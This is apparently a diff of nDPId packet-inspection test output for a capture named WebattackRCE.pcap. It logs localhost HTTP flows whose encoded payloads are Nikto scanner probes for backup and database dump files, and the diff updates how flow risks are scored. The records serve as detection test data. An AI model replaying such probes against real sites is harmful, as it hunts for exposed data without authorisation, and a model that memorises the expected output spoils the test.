 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277255,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/zTlAAEAGbv1\/AAABfwAAAcRmH5BLoPWWHSfpPoAYAED+swAAAQEICp1m\/S+dZv0vR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277255,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277258,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/W9xAAEAG4Fp\/AAABfwAAAcRoH5D01mN5gVzP14AYAED+swAAAQEICp1m\/TKdZv0yR0VUIC8xMjcuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277258,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277260,"pkt":"AAAAAAAAAAAAAAAACABFAADF4tJAAEAGWV5\/AAABfwAAAcRqH5C3Btp0g+NrSIAYAED+uQAAAQEICp1m\/TSdZv00R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277260,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277261,"pkt":"AAAAAAAAAAAAAAAACABFAADFGk1AAEAGIeR\/AAABfwAAAcRsH5AZ8SLp80IPEIAYAED+uQAAAQEICp1m\/TWdZv01R0VUIC8xMjdfMF8wXzEuemlwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277261,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277263,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/qndAAEAGkb9\/AAABfwAAAcRuH5AQK5LXaKY1oYAYAED+swAAAQEICp1m\/TadZv02R0VUIC8xMjcuc3FsIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277263,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277264,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
